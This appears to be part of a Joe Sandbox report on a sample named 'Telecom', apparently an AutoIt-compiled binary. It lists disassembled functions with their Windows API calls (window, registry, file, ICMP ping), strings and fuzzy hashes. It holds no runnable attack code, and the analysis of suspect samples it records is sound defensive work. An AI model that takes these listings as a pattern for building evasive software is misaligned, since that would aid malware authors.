Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$0+m"D$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-3870507045
Opcode ID: e18802f516db09719ce63631f72a70c59e82427d9bbcbf31e6161ba4ff424a55
Instruction ID: 40d34d1c500b55205a25c2b639c235dffbb938e45ad41604713048b9d7796320
Opcode Fuzzy Hash: e18802f516db09719ce63631f72a70c59e82427d9bbcbf31e6161ba4ff424a55
Instruction Fuzzy Hash: 3121F4B5D02308AFDB00DFA8EC89BDDBBB4FB08714F00812AF511A62A0D7B44594DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0044370F Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00443709,?,?), ref: 00443777
KillTimer.USER32(?,00000001,?,?,?,?,?,00443709,?,?), ref: 004437A3
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004437C6
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00443709,?,?), ref: 004437D1
CreatePopupMenu.USER32 ref: 004437E5
PostQuitMessage.USER32(00000000), ref: 00443806

Strings

TaskbarCreated, xrefs: 004437CC
0$Q, xrefs: 00483DF7
0$Q, xrefs: 00483DA9

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: 0$Q$0$Q$TaskbarCreated
API String ID: 129472671-1685287855
Opcode ID: 87415d94e71d2555d7e1b69e41d596cd11b8bbc0303c4e95dd827b630a5dd130
Instruction ID: e59e11504671eaf058eb1c8e676653c912f0e6611cdae2685b6d2d6b8fffe3f8
Opcode Fuzzy Hash: 87415d94e71d2555d7e1b69e41d596cd11b8bbc0303c4e95dd827b630a5dd130
Instruction Fuzzy Hash: C14115F0200140BBFB143F6C8C49BBA3BA9E715B17F00C52BF58585291CA7C9B59936E

Uniqueness

Uniqueness Score: -1.00%

Function 004809DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0048071A: CreateFileW.KERNEL32(00000000,00000000,?,00480A84,?,?,00000000,?,00480A84,00000000,0000000C), ref: 00480737

GetLastError.KERNEL32 ref: 00480AEF
__dosmaperr.LIBCMT ref: 00480AF6
GetFileType.KERNEL32(00000000), ref: 00480B02
GetLastError.KERNEL32 ref: 00480B0C
__dosmaperr.LIBCMT ref: 00480B15
CloseHandle.KERNEL32(00000000), ref: 00480B35
CloseHandle.KERNEL32(?), ref: 00480C7F
GetLastError.KERNEL32 ref: 00480CB1
__dosmaperr.LIBCMT ref: 00480CB8

Strings

H, xrefs: 00480C3D

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 9bcb141f0946f18b840213b59c1dd817fc21eb978a60dfdf7279ac8908129a66
Instruction ID: e250e10eda2558978163ccb2e1f5e1fb58157aa2b14b6771d7ec6e155bf76628
Opcode Fuzzy Hash: 9bcb141f0946f18b840213b59c1dd817fc21eb978a60dfdf7279ac8908129a66
Instruction Fuzzy Hash: 71A12732A201048FDF19EF68D852BAE7BA0AB06324F14415EF811DB3D1D7399D1BCB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004452A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00445594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 004455B2

Part of subcall function 00445238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0044525A

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004453C4
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00484BFD
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00484C3E
RegCloseKey.ADVAPI32(?), ref: 00484C80
_wcslen.LIBCMT ref: 00484CE7
_wcslen.LIBCMT ref: 00484CF6

Strings

\, xrefs: 00484CFC
\Include\, xrefs: 00445381
Software\AutoIt v3\AutoIt, xrefs: 004453BA
Include, xrefs: 00484BF4, 00484C35

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 98802146-2727554177
Opcode ID: 7baa34d64a466d9c47a3f87724222343817d1be1fe50225dfe7d317cb89cf7c4
Instruction ID: 6f0c175784aedcd4d3f2c6523134e9b7f14f2b21efce8a13e12c8cde6d0083cc
Opcode Fuzzy Hash: 7baa34d64a466d9c47a3f87724222343817d1be1fe50225dfe7d317cb89cf7c4
Instruction Fuzzy Hash: BE71AF715043019BD700EF66EC5199BBBE8FFA9344F80882FF45193260EB75DA49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004434D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 004434DE
LoadCursorW.USER32(00000000,00007F00), ref: 004434ED
LoadIconW.USER32(00000063), ref: 00443503
LoadIconW.USER32(000000A4), ref: 00443515
LoadIconW.USER32(000000A2), ref: 00443527
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0044353F
RegisterClassExW.USER32(?), ref: 00443590

Part of subcall function 00443624: GetSysColorBrush.USER32(0000000F), ref: 00443657
Part of subcall function 00443624: RegisterClassExW.USER32(00000030), ref: 00443681
Part of subcall function 00443624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00443692
Part of subcall function 00443624: InitCommonControlsEx.COMCTL32(?), ref: 004436AF
Part of subcall function 00443624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004436BF
Part of subcall function 00443624: LoadIconW.USER32(000000A9), ref: 004436D5
Part of subcall function 00443624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 004436E4

Strings

#, xrefs: 00443566
0, xrefs: 0044355F
AutoIt v3, xrefs: 0044357F

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: f961d6c7b048c8f74bbf81cca2c492a8e1a6c1a28a774a759ab175bbfd892e70
Instruction ID: bb2cfea494da681d62cc1e5dd5788e7b13a7a6bea600d0e340d231f665a0fc75
Opcode Fuzzy Hash: f961d6c7b048c8f74bbf81cca2c492a8e1a6c1a28a774a759ab175bbfd892e70
Instruction Fuzzy Hash: E9215070D00314ABDB109FA5EC55BD9BFB4FB18B50F00842BF614A63A0C3B90598DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00443B39 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00447AAB: FindCloseChangeNotification.KERNEL32(?,?,00000000,00483A42), ref: 00447ACB

Part of subcall function 00446FA2: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00443BC9,?,00008000), ref: 00446FD0

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00443CAD
_wcslen.LIBCMT ref: 00443D2C
SetCurrentDirectoryW.KERNEL32(?), ref: 00443E17

Strings

Unterminated string, xrefs: 0048457A
Error opening the file, xrefs: 0048452F, 00484596
AU3!, xrefs: 00443C5E
EA06, xrefs: 004841DA
Bad directive syntax error, xrefs: 00484508
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00484162

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2701412040-3738523708
Opcode ID: 37a30f085df7df0419885ed27fd8600ca952bb3b83cf9d568ae2bf21bb68a431
Instruction ID: 75b79c83ea8cd499edcaf456c37a7899006000db44d21da55047e0db891f44f4
Opcode Fuzzy Hash: 37a30f085df7df0419885ed27fd8600ca952bb3b83cf9d568ae2bf21bb68a431
Instruction Fuzzy Hash: 492288705083419FD724EF25C881AAFBBE4AF99708F10091FF485932A1DB39DA49CB5B

Uniqueness

Uniqueness Score: -1.00%

Function 004C0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000101,?), ref: 004C1019
inet_addr.WSOCK32(?), ref: 004C1079
gethostbyname.WS2_32(?), ref: 004C1085
IcmpCreateFile.IPHLPAPI ref: 004C1093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004C1123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004C1142
IcmpCloseHandle.IPHLPAPI(?), ref: 004C1216
WSACleanup.WSOCK32 ref: 004C121C

Strings

Ping, xrefs: 004C10D3

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 22fe3e553a1f1ecb63cffb48a7fbbffaaeb4fd342e1837a81cd9cfc11defd932
Instruction ID: d52f2c81645c672db72adc6263ba265fd34d0a3a1a233215ca288592df0f8d53
Opcode Fuzzy Hash: 22fe3e553a1f1ecb63cffb48a7fbbffaaeb4fd342e1837a81cd9cfc11defd932
Instruction Fuzzy Hash: 0291C0396042419FD360DF15C888F16BBE0AF49318F1885AEF5658B7B2CB38ED45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0044F6D0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

t5Q, xrefs: 004945E9
t5Qt5Q, xrefs: 0044F97E
t5Q, xrefs: 0044FBB1
t5Q, xrefs: 0044F8E0
t5Q, xrefs: 0049463C
Variable must be of type 'Object'., xrefs: 004948C6

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.$t5Q$t5Q$t5Q$t5Q$t5Qt5Q
API String ID: 0-4008631601
Opcode ID: a5398245558607d25d452547b68d539924164610d14106b269e0d02656476e8a
Instruction ID: a31049d06444b563303dcafe5067aa7e26ab24780acb73f1861cc2974784c632
Opcode Fuzzy Hash: a5398245558607d25d452547b68d539924164610d14106b269e0d02656476e8a
Instruction Fuzzy Hash: C7C29F75E00204DFDB24CF58C890AAEB7B1FF45304F24816BE945AB351E339AD4ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 00442793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0044327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 004432AF
Part of subcall function 0044327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 004432B7
Part of subcall function 0044327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004432C2
Part of subcall function 0044327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004432CD
Part of subcall function 0044327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 004432D5
Part of subcall function 0044327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 004432DD

Part of subcall function 00443205: RegisterWindowMessageW.USER32(00000004,?,00442964), ref: 0044325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00442A0A
OleInitialize.OLE32 ref: 00442A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00483A0D

Strings

d(Q, xrefs: 00442964
0$Q, xrefs: 00442A2E
$Q, xrefs: 0044280A
(&Q, xrefs: 00442932
4'Q, xrefs: 00442948

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: (&Q$0$Q$4'Q$d(Q$$Q
API String ID: 1986988660-34255742
Opcode ID: 7a153f34f402f108e44415faa7fbddce1aa6d12aec066ab5395effa9447b04eb
Instruction ID: 152b8ae8afe79679cb1c6d51f61d2669b20de844ed49c841354691ce4aaeefba
Opcode Fuzzy Hash: 7a153f34f402f108e44415faa7fbddce1aa6d12aec066ab5395effa9447b04eb
Instruction Fuzzy Hash: A271A1B09013009ED788EF7AADA56D53AE2FB68304F42C56ED408CB371EB744469EF58

Uniqueness

Uniqueness Score: -1.00%

Function 004790C5 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868a7a7363c760ac66ec680e74cfd9b149303133fb0841270f2cce5c7bb02c90
Instruction ID: 337116fcdcb1a9da79beea08930d1ca15c18865feca4b3f0a18d43371bd26052
Opcode Fuzzy Hash: 868a7a7363c760ac66ec680e74cfd9b149303133fb0841270f2cce5c7bb02c90
Instruction Fuzzy Hash: 27C12771D04349AFDF11DFA9D841BEE7BB0AF09304F04809AE958A7392C7389D46CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004435B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004435E1
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00443602
ShowWindow.USER32(00000000,?,?,?,?,?,?,00443368,?), ref: 00443616
ShowWindow.USER32(00000000,?,?,?,?,?,?,00443368,?), ref: 0044361F

Strings

edit, xrefs: 004435FC
AutoIt v3, xrefs: 004435D9, 004435DE, 004435DF

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 179285d5d263f3f67fc1af46561a82c598ea5e5c220612a8deb1e5ba55e0a3a1
Instruction ID: 9bc7296a8e5094c4bc7d36c519fc768febd89a2cff41ac80f64b15c30fbeadeb
Opcode Fuzzy Hash: 179285d5d263f3f67fc1af46561a82c598ea5e5c220612a8deb1e5ba55e0a3a1
Instruction Fuzzy Hash: 80F03A70A402947AE7310B136C08FB72FBDD7D6F10F00842EB914A7260C2690869EAB4

Uniqueness

Uniqueness Score: -1.00%

Function 004461A9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 122windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00485287

Part of subcall function 00448577: _wcslen.LIBCMT ref: 0044858A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00446299

Strings

AutoIt - , xrefs: 0044620D
Line %d: , xrefs: 00485305
s#s#, xrefs: 004852CF, 004852D8, 004852E3, 004852F1, 004852DC, 004852E7

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt - $s#s#
API String ID: 2289894680-316160236
Opcode ID: bf3762a8db8dc0f9fa39ba35e48f210d255fad65bc3e2daed0c06a1cefc8a018
Instruction ID: 65aafb1828fcc91a9b1dbf1f8c87ae32374652df37bdc406c81a7267f21ec233
Opcode Fuzzy Hash: bf3762a8db8dc0f9fa39ba35e48f210d255fad65bc3e2daed0c06a1cefc8a018
Instruction Fuzzy Hash: BD41C471408310AAD711FB21EC41ADF77DCAF55318F00492FF99592191EF789649CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00478A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,OVH,0047894C,?,00509CE8,0000000C,004789AB,?,OVH,?,0048564F), ref: 00478A84
GetLastError.KERNEL32 ref: 00478A8E
__dosmaperr.LIBCMT ref: 00478AB9

Strings

OVH, xrefs: 00478A30

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID: OVH
API String ID: 490808831-274800799
Opcode ID: 0c00629cdfd8b06044454701e7e17b6f09b0ae7eaad66e779b3abc94f0b2fbd9
Instruction ID: 82632825f305abf8802fd085a06a3a4276c74e581b990e0eb32b55f7f8789cc7
Opcode Fuzzy Hash: 0c00629cdfd8b06044454701e7e17b6f09b0ae7eaad66e779b3abc94f0b2fbd9
Instruction Fuzzy Hash: DB018E326465A01AC6246334AC4E7FF27494B92738F25812FF91C8F2C2DF7C8C81419D

Uniqueness

Uniqueness Score: -1.00%

Function 004458CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,004458BE,SwapMouseButtons,00000004,?), ref: 004458EF
RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,004458BE,SwapMouseButtons,00000004,?), ref: 00445910
RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,004458BE,SwapMouseButtons,00000004,?), ref: 00445932

Strings

Control Panel\Mouse, xrefs: 004458ED

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: b99d44bca7f168d9e0e91723411c37cdfb6e7327a843194b0a7e0a108bfecd11
Instruction ID: 40b2b5b6132cc680ee33f3fafa783469f1f078e371402264cf5b23fb4f843865
Opcode Fuzzy Hash: b99d44bca7f168d9e0e91723411c37cdfb6e7327a843194b0a7e0a108bfecd11
Instruction Fuzzy Hash: 6E117CB5511618FFEF218F64DC81EAFBBB8EF45764F10842AF801E7210E6359E419768

Uniqueness

Uniqueness Score: -1.00%

Function 004ADB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,004DDC30), ref: 004ADBA6
GetLastError.KERNEL32 ref: 004ADBB5
CreateDirectoryW.KERNEL32(?,00000000), ref: 004ADBC4
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,004DDC30), ref: 004ADC21

Memory Dump Source

Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true

Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_440000_Telecom.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 54ee008c49fa238a94eec59938561a9863f62c082a4a2e733a0d1bdfdf1a7506
Instruction ID: 2f2324b38bf3f3b03f6ad2e2fe456cdaf4ea6b36c194af8d695249ac9e81aa9e
Opcode Fuzzy Hash: 54ee008c49fa238a94eec59938561a9863f62c082a4a2e733a0d1bdfdf1a7506
Instruction Fuzzy Hash: 3D21E7709443019F8710DF24C88086BB7E8EF67764F500A1FF49AC72A1D734D946CB5A

Uniqueness

Uniqueness Score: -1.00%

